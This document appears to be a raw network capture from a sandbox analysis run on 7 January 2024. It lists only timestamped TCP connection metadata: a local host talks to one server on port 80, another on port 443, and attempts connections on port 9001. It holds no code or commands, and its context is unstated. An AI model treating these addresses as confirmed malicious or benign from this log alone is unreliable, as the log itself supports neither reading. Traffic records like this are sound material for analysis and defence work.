                                                                                                                                                                    Jan 7, 2024 05:29:56.459280014 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.462085009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.462177038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.462240934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.463867903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.463901043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.464241028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.468241930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.468337059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.468389988 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.468404055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.468533993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.468581915 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.470395088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.470468044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.470516920 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.470520020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.470606089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.470655918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.470679998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.470710039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.470746994 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.470809937 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.470907927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.470949888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.512022018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.512099981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.512175083 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.516313076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.516398907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.516448975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.516484022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.516539097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.516577005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.516623974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.516696930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.516736984 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.517199039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.517333984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.517374992 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.565361977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.565388918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.565468073 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.579746962 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.579837084 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.581073999 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.581094027 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.581373930 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.582587004 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.582717896 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.582726955 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.654378891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.654412031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.654484034 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.657062054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.657123089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.657179117 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.658638954 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.658701897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.658761978 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.662492037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.662566900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.662620068 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.662647963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.662724972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.662770987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.664608002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.664675951 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.664726019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.664875984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.664977074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.665024996 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.665052891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.665162086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.665201902 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.665234089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.665332079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.665370941 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.707340956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.707500935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.707555056 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.711678982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.712415934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.712471008 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.712697983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.712718010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.712769032 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.712910891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.712927103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.712964058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.713063955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.713077068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.713118076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.759113073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.759129047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.759315014 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.848289013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.848345041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.848473072 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.850773096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.850795984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.850855112 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.852514982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.852552891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.852596998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.856446981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.856513977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.856548071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.856558084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.856647968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.856703997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.858552933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.858624935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.858669043 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.858686924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.858740091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.858772993 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.858810902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.858906031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.858939886 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.859004021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.859076977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.859110117 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.901542902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.901616096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.901667118 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.906557083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.907239914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.907299042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.907401085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.907493114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.907541037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.907586098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.907644033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.907680035 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.907696009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.907756090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.907798052 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.953021049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.953170061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.953228951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.010236025 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.010360003 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.010411978 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.010490894 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.010510921 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.023605108 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.023654938 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.023725033 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.024204969 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.024219036 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.043132067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.043231010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.043282986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.045763969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.045809984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.045859098 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.158694983 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.158740044 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.215648890 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.215739012 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.217180967 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.217191935 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.217441082 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.218672991 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.218803883 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.218807936 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.353318930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.370498896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.373147964 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.373172998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.567011118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.583707094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.587569952 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.587621927 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.646766901 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.646883011 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.646961927 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.648200989 CET49760443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.648217916 CET44349760172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.665040970 CET49762443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.665092945 CET44349762172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.665162086 CET49762443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.665740967 CET49762443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.665760040 CET44349762172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.782748938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.798913002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799015045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799104929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.799124002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799217939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799298048 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.799307108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799390078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799432039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.799462080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799586058 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799627066 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.799736023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799829960 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.799875975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.799946070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800020933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800064087 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.800088882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800117016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800190926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800198078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.800240040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800277948 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.800287962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800405979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800447941 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.800479889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800548077 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.800821066 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.801007032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801079035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801161051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801207066 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.801228046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801273108 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.801300049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801367044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801425934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801454067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.801526070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801573038 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.801603079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801723003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801846981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.801889896 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.860127926 CET44349762172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.860225916 CET49762443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.861669064 CET49762443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.861682892 CET44349762172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.861989975 CET44349762172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.863367081 CET49762443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.863498926 CET49762443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:57.863512993 CET44349762172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.919217110 CET497559001192.168.2.488.198.112.25
                                                                                                                                                                    Jan 7, 2024 05:29:57.994020939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994060040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994138002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994199991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.994236946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994282007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.994318008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994362116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994416952 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.994450092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994525909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994568110 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.994620085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994843006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.994959116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995002985 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.995034933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995076895 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.995134115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995229959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995311022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995349884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.995352030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995385885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.995513916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995579004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995663881 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995704889 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.995800018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995839119 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.995899916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.995989084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996079922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996120930 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.996167898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996206045 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.996233940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996304989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996368885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996407986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.996437073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996474028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:57.996514082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996634007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996684074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:57.996737003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:58.122337103 CET497439001192.168.2.478.46.174.72
                                                                                                                                                                    Jan 7, 2024 05:29:58.189305067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:58.189353943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:58.189429045 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:58.189429998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:58.189469099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:58.189513922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:58.189538002 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:58.189596891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:58.189630985 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:58.190021992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:58.190098047 CET804973591.215.85.120192.168.2.4
